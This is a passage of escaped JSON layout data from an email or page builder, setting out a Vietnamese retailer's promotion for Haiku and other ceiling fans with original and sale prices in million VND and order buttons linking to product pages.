60\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xlktZNhNOB\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">39.6 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup><span style=\\\\\\\"line-height: 12px;\\\\\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">32.6 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"UAWeiywcki\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh-cao-cap-haiku-60inch-caramel-bamboo.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderRightWidth\\\":\\\"0px\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderBottomWidth\\\":\\\"0px\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\"},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"9GAi5wAFJk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"UQ82n-sdLO\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Xubqp58wuc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766160579-nexus-wh.jpg\\\",\\\"width\\\":360,\\\"height\\\":240,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"DTDUZT5wAg\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YCqOrNUvWj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>NEXUS WH\\/BL 60\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"B9Jq0s6_xN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">7.9 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">6.3 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BDg2R7p2Jw\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_11\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_30\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"b_icNQD3au\\\",\\\"contents\\\":[{\\\"id\\\":\\\"OYQTIWRx_V\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766391705-KATRINA.jpg\\\",\\\"width\\\":360,\\\"height\\\":240},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_13\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"iOxGCwHnL9\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BqLxS58gL7\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>KATRINA LED 52\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"6gLqBsNTdj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">6.5 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup><span style=\\\\\\\"line-height: 12px;\\\\\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">5.2 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"vjc-iDHt2-\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_12\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_31\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_22\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"D9WFj6utYl\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"W5X7-Y1bCd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qvrza6rMrd\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768098980-L-44-wh.jpg\\\",\\\"width\\\":360,\\\"height\\\":240,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_15\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3ig6Uhzh9N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"EUKoF0D2_s\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>HAIKU WH\\/BL 44\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"wb2kmgb7-n\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">18.5 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">15.8 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"W7bv0iVLVR\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-44inch-mau-trang.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_13\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_33\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"BH2N6Qgeka\\\",\\\"contents\\\":[{\\\"id\\\":\\\"m8THhQ4u4L\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768333052-HAIKU-I-S.jpg\\\",\\\"width\\\":360,\\\"height\\\":240},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\"